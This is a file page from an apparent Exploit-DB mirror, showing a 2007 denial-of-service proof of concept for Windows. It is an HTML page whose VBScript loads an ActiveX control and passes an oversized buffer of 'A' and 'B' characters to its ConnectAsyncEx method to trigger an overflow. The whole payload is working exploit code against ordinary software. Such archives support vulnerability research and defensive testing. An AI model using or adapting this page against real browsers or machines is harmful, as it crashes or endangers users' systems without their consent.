exploit-db-mirror/exploits/windows/dos/3873.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

17 lines
No EOL
355 B
HTML

<html>
<object classid='clsid:62FA83F7-20EC-4D62-AC86-BAB705EE1CCD' id='target'></object>
<script language = 'vbscript'>
buff = String(3543,"A")
get_EAX = "aaaa"
get_EBX = "cccc"
buff2 = String(1440,"B")
egg = buff + get_EAX + get_EBX + buff2
target.ConnectAsyncEx egg, 1, "default"
</script>
</html>
# milw0rm.com [2007-05-08]